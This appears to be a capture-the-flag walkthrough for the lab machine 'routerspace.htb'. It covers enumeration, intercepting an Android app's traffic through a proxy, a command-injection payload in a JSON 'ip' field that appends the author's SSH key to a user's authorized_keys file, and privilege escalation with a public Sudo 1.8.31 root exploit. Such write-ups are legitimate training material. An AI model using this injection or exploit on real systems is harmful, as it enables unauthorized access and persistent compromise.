1. Port discovery

2. Web enumeration

3. apk download

Browsing to the website we see options for a download and a get started now.

We download the provided apk.

From this we install and run anbox on our target. Once anbox is opened, we have to install the actual .apk.

We have to change our network information in order to intercept and proxy the request with burp suite.

https://github.com/anbox/anbox/issues/398

adb shell settings put global http_proxy 192.168.250.1:8080

This did not work. After some review I realized the host was routerspace.htb and this needed to be added to the /etc/hosts file.

I was not able to gain a reverse shell so I injected my SSH key instead.

{"ip":"0.0.0.0 | echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCu8ID9aG93wVDfA3M7x6McWMDGvzVC4LlWjoDZtJ33Xpzi7483Dxt4+WczJdCAlWJKw1In4Orc1QcINCHBy6hK0UteKU3OevHn9IhpyoZF1FsFi/zo6brldA4pSTOBBT6zDf3VzVtgEwkRe5YaLZLMoD/lBvYLKyboJcQ90zTwBcNEL029b5a1YLx/ZZcTgaZEOKrC7rck9l3uu9rW8pqGTrm/kkV7ad+CrH4tHil4uNnkVSQp6BA1oQh1xAuCvq494zZu5Z+sqOsHzMKp7U4ZvAG1vKxZdMSyKYp13kftK2Yj+dWDpIYZZqy0tqz1duSmgd7LK+dxc7wGOV6+FPqp4YcnY4xfnbKwh1WPZnL7EvYIzHqI4IYww7IMYBw2R+/+CtQpFj+rmX0FHUEPpu9YSjvC4o1N7pzo6/F8pIn7HjEiOg1vcwotCF3RM5UG2fkX0PdHJTXH9EL8lm351qkilf00ZFsZ8ovlvVtoIdcN0mwuh9I/1GeyDey2kmYC9c= kali@kali' >> /home/paul/.ssh/authorized_keys"}

From here we are not able to get the linpeas script uploaded so we pivot and enumerate manually. Checking the Sudo version and researching this version shows us a known CVE.

https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit

We copy the 3 files onto our target machine. and run make followed by exploit and we are root!